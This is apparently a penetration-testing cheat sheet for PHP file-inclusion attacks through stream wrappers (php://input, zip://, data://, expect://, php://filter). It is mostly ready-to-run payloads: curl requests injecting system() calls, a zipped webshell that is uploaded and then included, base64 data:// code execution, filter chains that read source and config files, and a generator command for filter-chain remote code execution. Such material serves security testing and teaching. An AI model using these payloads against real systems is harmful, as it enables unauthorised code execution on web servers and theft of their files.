PHP Wrappers

php://input Wrapper

Allows reading raw POST data. Useful when you can control POST body but not GET parameters.

Send POST request with PHP code in body

curl -X POST --data "<?php system('id'); ?>" "http://target.com/index.php?page=php://input"

More complex payload

curl -X POST --data "<?php system(\$_GET['cmd']); ?>" "http://target.com/index.php?page=php://input&cmd=whoami"

zip:// Wrapper

Remote Code Execution

The zip:// stream wrapper can be used in specific attack scenarios to potentially execute malicious code.

• First, create the webshell:

echo '<?php system($_REQUEST['cmd']); ?>' > cmd.php

• Second, zip the file:

zip shell.zip cmd.php

• Important to mention that the file extension can be different from .zip, the wrapper will still execute the code inside.

• Third, upload the file and once is done, use the wrapper:

zip://uploads/PATH/TO/FILE%23cmd&cmd=id

• Have in mind that %23 is the URL encoded version of # and is used to reference a file inside the zip

data:// Wrapper

data:// Wrapper

The data:// wrapper allows you to embed data directly in the URL using data URIs.

Requirements: allow_url_include = On in php.ini

Direct PHP code execution

http://target.com/index.php?page=data://text/plain,<?php system($_GET['cmd']); ?>

With command parameter:

http://target.com/index.php?page=data://text/plain,<?php system($_GET['cmd']); ?>&cmd=id

http://target.com/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+

expect:// Wrapper

expect:// Wrapper

The expect:// wrapper allows you to execute system commands directly (rarely enabled).

Requirements: PECL expect extension installed and allow_url_include = On

http://target.com/index.php?page=expect://id
http://target.com/index.php?page=expect://ls

Look for "expect" in extensions

<?php phpinfo(); ?>

php://filter Chains

Filter Inclusion

Exfiltrate files

php://filter/read=convert.base64-encode/resource=<PATH_TO_THE_FILE>

Exfiltrate the source code

php://filter/convert.base64-encode/resource=dashboard

String Operations

Uppercase conversion

php://filter/read=string.toupper/resource=index.php

php://filter/read=string.toupper|string.tolower/resource=index.php

ROT13 encoding

php://filter/read=string.rot13/resource=index.php

Conversion Filters

UTF-16 conversion (can bypass WAF)

php://filter/convert.iconv.utf-8.utf-16/resource=config.php

Multiple conversions

php://filter/convert.iconv.utf-8.utf-16le|convert.base64-encode/resource=config.php

Custom Filter Chains for RCE (PHP 8.x)

This technique uses filter chains to achieve RCE without using any wrappers or include statements:

Download the tool

git clone https://github.com/synacktiv/php_filter_chain_generatorSome

Generate malicious filter chain

python3 php_filter_chain_generator.py --chain '<?php system($_GET[0]); ?>'

GitHub - synacktiv/php_filter_chain_generatorGitHub